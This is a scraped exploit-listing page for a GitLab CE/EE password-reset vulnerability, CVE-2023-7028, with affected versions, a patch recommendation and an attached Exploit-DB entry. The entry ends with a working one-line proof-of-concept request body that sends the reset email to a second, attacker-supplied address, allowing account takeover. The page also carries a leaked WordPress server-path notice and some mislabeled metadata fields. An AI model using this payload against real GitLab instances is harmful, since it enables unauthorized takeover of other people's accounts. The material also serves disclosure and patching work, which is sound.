Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
GitLab CE/EE < 16.7.2 - Password Reset - exploit.company
header-logo
Suggest Exploit
vendor:
GitLab CE/EE
by:
Sebastian Kriesten
6.1
CVSS
HIGH
Password Reset Vulnerability
862
CWE
Product Name: GitLab CE/EE
Affected Version From: GitLab CE/EE < 16.7.2, < 16.6.4, < 16.5.6
Affected Version To: 16.7.1 and below
Patch Exists: YES
Related CWE: CVE-2023-7028
CPE: a:gitlab:gitlab
Platforms Tested:
2024

GitLab CE/EE < 16.7.2 - Password Reset

The vulnerability in GitLab CE/EE versions prior to 16.7.2 allows an attacker to perform a password reset on a user account without proper authorization. This could lead to unauthorized access to user accounts.

Mitigation:

To mitigate this vulnerability, users are advised to update GitLab CE/EE to version 16.7.2 or later.
Source

Exploit-DB raw data:

# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset
# Exploit Author: Sebastian Kriesten (0xB455)
# Twitter: https://twitter.com/0xB455

# Date: 2024-01-12
# Vendor Homepage: gitlab.com
# Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
# Version: <16.7.2, <16.6.4, <16.5.6
# CVE: CVE-2023-7028

Proof of Concept:
user[email][]=valid@email.com&user[email][]=attacker@email.com